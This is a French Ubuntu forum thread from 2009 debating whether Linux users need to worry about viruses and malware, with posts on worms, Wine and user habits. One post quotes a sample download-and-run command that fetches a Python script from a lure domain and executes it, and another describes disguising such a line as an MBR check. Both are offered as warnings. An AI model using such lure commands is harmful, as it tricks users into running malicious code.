Les logiciels malveillant sur Linux tout le monde s'en fout ?

bailchanis · Le 08/12/2009, à 00:29

pipocas a écrit :

@bailchanis: rien de perso c'est juste qu'on le sait qu'il faut faire attention.

bah écoute si tu le sais et que l'applique très bien... mais, pour certains, à lire leurs affirmations erronées je me suis dit qu'un rappel de quelques faits n'etait pas du luxe.
je ne venais pas faire une divine révélation mais rappeler quelques faits, corriger quelques confusions et autres croyances (infection Vs intrusion, les virus ont besoin de faille système pour etre un souci ou se propager et autres fausses-croyances).

Dernière modification par bailchanis (Le 08/12/2009, à 00:36)

bailchanis · Le 08/12/2009, à 00:34

superpapalolo a écrit :

bailchanis a écrit :
la question n'est pas "libre" ou "proprétaire" ça n'a rien à voire avec la choucroute !
c'est pourtant la base. C'est la raison essentielle pour laquelle internet est secure et pas les OS proprio. Mais peut-être n'arrives-tu pas à l'entendre.

Internet est donc un logiciel, libre de surcroit et secure oO !? (sic)
La messe est dite ! l'expert a parlé !

Sinon, ton firewall openoffice te protège bien ?

Aller, on va dire que c'est la fatigue qui parle.

꙳♒⏅⚓ ЅаίԼίՈԶ ⚓⏅♒꙳ · Le 08/12/2009, à 00:47

Serais-tu à ce point inculte sur internet ?

un logiciel ? open office ? firewall ? On dirait albanel qui écrit lorsqu'on te lit

Bon troll bien et invente des virus linux, ça peut t'occuper un moment

Henry de Monfreid · Le 08/12/2009, à 01:05

De toutes façons, des virus linux, peronne n'en a jamais eu sur ce forum, et on y est très nombreux.

Et à chaque fois je lis le même rengaine : "si, si les virus linux c'est possible, la preuve j'ai eu un ver et les rootkits ça existe".

Un virus ce n'est pas un ver, ni un rootkit ou encore un trojan.

Tout ça, ce sont des idées reçues, l'habitude des victimes (pardon, les clients) de MS, de penser que ce n'est pas possible que les virus linux n'existent pas et qu'un systeme soit sécurisé "out of the box".

Ça me rapelle un blaireau qui m'a traité de mythomane quand je lui ai dit que mon filesystem ne fragmentait pas.

Il y a deux types de newbees : ceux qui sont content de ne plus deveroller/defragmenter/re-installer, et ceux qui n'acceptent pas qu'ils auraient pu s'en passer.

Dur pour eux d'admetre qu'ils se sont fait entuber.

bailchanis · Le 08/12/2009, à 01:49

superpapalolo a écrit :

Serais-tu à ce point inculte sur internet ?
un logiciel ? open office ? firewall ? On dirait albanel qui écrit lorsqu'on te lit
Bon troll bien et invente des virus linux, ça peut t'occuper un moment

Si ma dernière réponse te rappelle les propos d'albanel ce n'est pas un hasard, mais visiblement la fatigue qui te fait dire des bétises t'empeche également de reconnaitre un sarcasme quand tu en lis un ... Comment dis l'adage déjà ? je ne sais plus mais il y a une histoire de doigt et de lune dedans

Non serieusement... lis un peu les liens que j'ai mis plus haut. Quand tu auras compris ce qu'ils racontent on pourra discuter de l'aspect "particulier" des conditions ...

Internet secure ... on aura tout lu ... tu veux dire comme bind à la conception si "parfaite" (parce que c'est un logiciel libre évidemment) qu'il a fallu le revoir en profondeur et en secret ... ? (t'emballes pas c'est de la provoc...)

Tu entends quoi par "les petits reseaux proprios"? tu es au courant que ça fait un moment que même windows utilise TCP/IP comme protocole par défaut ? Tu comprends la différence entre la sécurité d'un reseau et la sécurité d'un OS ? visiblement pas ...

Au fond tu donnes un bel exemple de ce que fustige l'auteur de l'article sur la "bad linux advocacy".
On a le droit de fustiger windows pour ses failles mais pas de dire que linux n'est pas infaillible ni immunisé aux virus. Non on a pas le droit c'est sacré ! Te rends tu comptes que tu réagis comme un bigot à qui on a dit que dieu n'existe pas ?

Au passage, je note la performence, tu as mis trois messages à employer le mot magique qui fait de toi le gentil défenseur de la divine parole et de moi le mécréant/hérétique qui ne fait rien qu'a dire du mal de ton divin système qui sauvera le monde :S ... (alors que si tu me relis bien je n'ai absolument dit aucun mal de linux... ça serait d'ailleurs difficile puisque je n'en pense pas de mal).

Et dire que je suis moi-même un utilisateur convaincu des qualités de linux au point de n'utiliser que cela.

Tout ça, ce sont des idées reçues, l'habitude des victimes (pardon, les clients) de MS, de penser que ce n'est pas possible que les virus linux n'existent pas et qu'un systeme soit sécurisé "out of the box".
Ça me rapelle un blaireau qui m'a traité de mythomane quand je lui ai dit que mon filesystem ne fragmentait pas.

Pour la n-ième fois, vas voir le lien sur l'ecriture d'un virus et tu veras que c'est pas une chimère.
Ce n'est pas répandu parce qu'il n'y a pas d'interet pour les dev/diffuseurs/exploitants de virus pour le moment mais la raison n'est pas une sécurisation "out-of-the-box" ! (même si linux est bien plus robuste que widnows il n'est pas invulnérable...).

Sinon, pour la fragmentation, tu utilises reiserfs (qui effectivement ne fragmente pas... mais bonjour l'usure des disques) ? parce que ext2, 3 ou 4 fragmentent (et quand on comprend comment ils fonctionnent c'est simplement une évidence ! ). Certes ils fragementent nfiniement moins que ntfs ou fat (heureusement pour nous) , mais techniquement ils fragmentent quand même .. d'où l'existence d'uitilitaires de défragementation pour ext3 (en pratique plus dangereux qu'utiles) et le fait que ext4 inclut un utilitaire de defragmentation qui ne demande pas de convertir le fs ...

serieusement les gars c'est très louable de vouloir défendre linux (quand on l'attaque vraiment) mais là ... vous dépassez le mur du çon... surtout ne le défendez pas trop en publique vous risquez vraiment de décridibiliser la communauté face à des refractaires qui ont par ailleurs une bien meilleure connaissance et compréhension que vous des systèmes informatiques.

Personne dans ce fil n'a attaqué le système linux, personne ne l'a vraiment critiqué, par contre vous vous répandez en attaques complètement à coté de la plaque dès qu'on dit qu'il n'est pas divinement parfait.

Dernière modification par bailchanis (Le 08/12/2009, à 01:50)

Grünt · Le 08/12/2009, à 02:18

Un virus sous GNU/Linux, c'est débile.
Les virus se reproduisent en recopiant leur propre code dans les binaires, et se diffusent via les copies de ces binaires.
Les utilisateurs de Windows échangent souvent des binaires sans le savoir: via l'autorun de leur clef USB, par exemple, ou via Windows Live Messenger.
Mais les utilisateurs de GNU/Linux s'échangent rarement des binaires: le fait que les fichiers téléchargés perdent l'attribut "exécutable", l'existence d'un "PATH" qui n'inclue pas le chemin courant, élimine l'exécution incontrôlée de binaires.

Par contre, un ver, c'est à dire un code malveillant autonome qui exploite une faille du système, pourquoi pas?

bailchanis · Le 08/12/2009, à 02:36

ǤƦƯƝƬ a écrit :

Un virus sous GNU/Linux, c'est débile.
Les virus se reproduisent en recopiant leur propre code dans les binaires, et se diffusent via les copies de ces binaires.
Les utilisateurs de Windows échangent souvent des binaires sans le savoir: via l'autorun de leur clef USB, par exemple, ou via Windows Live Messenger.
Mais les utilisateurs de GNU/Linux s'échangent rarement des binaires: le fait que les fichiers téléchargés perdent l'attribut "exécutable", l'existence d'un "PATH" qui n'inclue pas le chemin courant, élimine l'exécution incontrôlée de binaires.
Par contre, un ver, c'est à dire un code malveillant autonome qui exploite une faille du système, pourquoi pas?

Oui (pour le en gras) ! Ca c'est un élément qui contrôle plutot pas mal leur propagation d'un élément à un autre Mais ça repose plus sur de saines habitudes des users (qui ont moins recours au "tu veux un programme qui fait pouet ? j'en ai un , attends, je te le passe si tu veux... ) que sur la nature du système

Moyennant quoi, un binaire malencontreusement vérolé executé (plus ou moins consciemment) par un user trp confiant et sa machine peut se transformer en bouillon de culture ^^ Pour ce qui est de l'execution incontrolée, (%bash -c "curl http://nudehotsofhotgirls.org/s.py -o /tmp/s.py; python /tmp/s.py" ... dans un launcher qui va bien en pièce jointe alléchante ?)

Bon certes, les degats sont surtout pour sa pomme mais quand même ... risque minime n'est pas sans risque

et puis pourquoi se focaliser sur les failles, pourquoi des "features" ? certes les failles ça compte mais un user peut en faire des trucs sur une machine pourtant il n'exploite pas de faille.

Henry de Monfreid · Le 08/12/2009, à 02:46

bailchanis a écrit :

Oui (pour le en gras) ! Ca c'est un élément qui contrôle plutot pas mal leur propagation d'un élément à un autre Mais ça repose plus sur de saines habitudes des users (qui ont moins recours au "tu veux un programme qui fait pouet ? j'en ai un , attends, je te le passe si tu veux... ) que sur la nature du système

Justement si, la nature du systeme, les dépots, la gratuité et la disponibilité des softs fait qu'on ne se refile pas des logiciels crackés d'origine douteuse.

Grünt · Le 08/12/2009, à 02:51

pinballyoda a écrit :

Justement si, la nature du systeme, les dépots, la gratuité et la disponibilité des softs fait qu'on ne se refile pas des logiciels crackés d'origine douteuse.

Une ligne de commande, c'est déjà, potentiellement, un logiciel, parce qu'en une ligne tu peux télécharger un binaire, le rendre exécutable et l'exécuter. Et tu peux obfusquer ça de telle façon qu'un débutant croira qu'il vérifie son MBR avec cette ligne.
Tu en connais beaucoup de gens qui vérifient les lignes de commande avant de les taper? Qui se documentent, qui se rendent compte que tu leurs fais télécharger un script en python sur un serveur Web basé en Russie, via une ligne de commande écrite en hexa puis décodée à la volée pour l'envoyer à l'interpréteur bash, tout en prétextant que le code hexadécimal c'est le MBR de Grub?

MiNiShOoTeR · Le 08/12/2009, à 03:24

ǤƦƯƝƬ a écrit :

pinballyoda a écrit :
Justement si, la nature du systeme, les dépots, la gratuité et la disponibilité des softs fait qu'on ne se refile pas des logiciels crackés d'origine douteuse.
Une ligne de commande, c'est déjà, potentiellement, un logiciel, parce qu'en une ligne tu peux télécharger un binaire, le rendre exécutable et l'exécuter. Et tu peux obfusquer ça de telle façon qu'un débutant croira qu'il vérifie son MBR avec cette ligne.
Tu en connais beaucoup de gens qui vérifient les lignes de commande avant de les taper? Qui se documentent, qui se rendent compte que tu leurs fais télécharger un script en python sur un serveur Web basé en Russie, via une ligne de commande écrite en hexa puis décodée à la volée pour l'envoyer à l'interpréteur bash, tout en prétextant que le code hexadécimal c'est le MBR de Grub?

Quasi personne ne le fait, au mieux, on survole la ligne, si on comprends pas, on se dit que le mec qui l'a écrit s'y connais mieux que nous, et on exécute...

De toute façon, il n'y a aucun doute que, la première et la plus grande faille d'un ordinateur, c'est l'administrateur, qui réalise des actions parfois stupide, par méconnaissance, par confiance et/ou par naïveté.

Et contre ça, même le meilleur antivirus/anti-spyware/anti-malware/anti-truc/anti-chose qui prend le peu de RAM que Vista laisse n'y peut rien!

Dernière modification par MiNiShOoTeR (Le 08/12/2009, à 03:24)

pipocas · Le 08/12/2009, à 11:16

Perso je les ai vérifiées les lignes que j'ai tapées au départ. Faut dire qu'il n'y en avait pas beaucoup... Question de précaution non? (et aussi de curiosité)

DrDam · Le 08/12/2009, à 11:46

bon je vous laisse vous battre .. c'est assez intéressant et instructif

MdMax · Le 08/12/2009, à 12:00

ǤƦƯƝƬ a écrit :

Un virus sous GNU/Linux, c'est débile.
Les virus se reproduisent en recopiant leur propre code dans les binaires, et se diffusent via les copies de ces binaires.
Les utilisateurs de Windows échangent souvent des binaires sans le savoir: via l'autorun de leur clef USB, par exemple, ou via Windows Live Messenger.
Mais les utilisateurs de GNU/Linux s'échangent rarement des binaires: le fait que les fichiers téléchargés perdent l'attribut "exécutable", l'existence d'un "PATH" qui n'inclue pas le chemin courant, élimine l'exécution incontrôlée de binaires.
Par contre, un ver, c'est à dire un code malveillant autonome qui exploite une faille du système, pourquoi pas?

Ta définition me rappelle MS-DOS. Il faut qu'on se mette d'accord sur ce qu'on appelle "virus". Virus au sens strict, tu as parfaitement raison. Mais j'ai l'impression que ici, l'auteur du sujet pensait à virus au sens large, et pour Wikipédia "on utilise souvent et abusivement le mot virus pour désigner toute forme de programme malveillant (malware)".

Aujourd'hui je pense aussi qu'il ne faut pas seulement se concentrer sur des "binaires" (exécutables compilés), et plutôt penser à tout fichier qui pourrait constituer une menace, et donc contenant des instructions, que ce soit du binaire, ou de l'interprété. Cela va des scripts, bash ou javascript dans des PDF ou pages web, jusqu'aux extensions ou plug-ins de navigateurs, qui pourraient parfaitement contenir un keylogger, et que les gens ne vont pas forcément chercher dans Synaptic ou sur le site sécurisé de Mozilla.

Les témoignages ici montrent aussi la "qualité" de Wine. Il devient tellement complet et compatible avec XP qu'il est capable de faire tourner certains des malwares de XP. Pour tous ceux qui l'utilisent, ça peut aussi représenter un gros risque.

Rien que pour ça, il est urgent d'informer tout nouveau utilisateur GNU/Linux qu'il doit lui aussi se préoccuper de la sécurité, même si Linux lui-même, ne craint pas les virus au sens strict du terme.

Grünt · Le 08/12/2009, à 12:43

Oui, Wine présente un risque, mais mesuré: à moins d'une faille de Wine qui serait exploitée par un logiciel (on n'en est pas encore là, si? ), Wine ressemble un peu à un chroot: les logiciels exécutés ne peuvent pas toucher à autre chose qu'aux "lecteurs" que Wine met à leur disposition.
Après, si tu dit à Wine que la partition "D:" c'est ton home, ça me parait évident qu'un logiciel que tu lanceras dans Wine pourra potentiellement y accéder.

Le problème de sécurité à ce niveau c'est, là encore, l'éducation de l'utilisateur: non, Linux ne "tue" pas les vers et les virus par magie, et oui, un logiciel malveillant qui s'exécute dans Wine reste malveillant.

valAa · Le 08/12/2009, à 12:54

ǤƦƯƝƬ a écrit :

Oui, Wine présente un risque, mais mesuré: à moins d'une faille de Wine qui serait exploitée par un logiciel (on n'en est pas encore là, si? ), Wine ressemble un peu à un chroot: les logiciels exécutés ne peuvent pas toucher à autre chose qu'aux "lecteurs" que Wine met à leur disposition.
Après, si tu dit à Wine que la partition "D:" c'est ton home, ça me parait évident qu'un logiciel que tu lanceras dans Wine pourra potentiellement y accéder.

Il me semble justement que dans une install standard de wine, l'ensemble du système de fichier est monté sous z:
Après il y a les droits, mais le home est donc accessible.

le hollandais volant · Le 08/12/2009, à 14:34

@bailchanis
J'ai surement fait quelque erreurs sur les failles/virus… oui

Tout à fait d'accord qu'il faut aussi faire gaffe à ce que l'on télécharges, mais bon… Je pense que tout le monde ici sait qu'un fichier "comment-avoir-la-plus-grosse.ppt" ou "programme-miracle-gratuit.exe" sont surement bourrées de virus… du moins je l'espère. Le plus gros virus, c'est l'utilisateur, et le patcher, prend du temps, mais ça se fait.
Je ne dit pas ne jamais faire d'erreurs (à mes débuts sous XP, j'avais pas le net, je téléchagais tous mes logiciels au lycée. Je me suis fait avoir par un écran de veille qui contenait des virus. J'ai du tout formater…) mais j'ai appris à ne pas les refaire.

Un linux mal configuré au niveau du pare feu ou des mise à jour ne vaut pas mieux que windows ; mais sous linux, par défaut, c'est bien configuré. Pas windows.

Pendant des années windows est resté avec WMP et IE soudé, une faille de l'un devenait une faille générale. Et m$ de pas les corriger.

Je me fout pas des virus sous linux, loin de là, mais mon esprit est quand même plus tranquille que sous windows où je scan même une image où un pdf car je sait que windows peut se faire avoir (surtout en se basant exclusivement sur l'extension du fichier), extension, qui en la supprimant sous linux révèlera la vrai nature du fichier…

MdMax · Le 11/12/2009, à 12:20

Le débat continue ici avec un terme plus approprié: "malware" au lieu de "virus"
http://forum.ubuntu-fr.org/viewtopic.php?id=364838

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#76 Le 08/12/2009, à 00:29

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#77 Le 08/12/2009, à 00:34

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#78 Le 08/12/2009, à 00:47

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#79 Le 08/12/2009, à 01:05

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#80 Le 08/12/2009, à 01:49

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#81 Le 08/12/2009, à 02:18

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#82 Le 08/12/2009, à 02:36

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#83 Le 08/12/2009, à 02:46

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#84 Le 08/12/2009, à 02:51

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#85 Le 08/12/2009, à 03:24

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#86 Le 08/12/2009, à 11:16

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#87 Le 08/12/2009, à 11:46

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#88 Le 08/12/2009, à 12:00

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#89 Le 08/12/2009, à 12:43

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#90 Le 08/12/2009, à 12:54

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#91 Le 08/12/2009, à 14:34

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

#92 Le 11/12/2009, à 12:20

Re : Les logiciels malveillant sur Linux tout le monde s'en fout ?

Pied de page des forums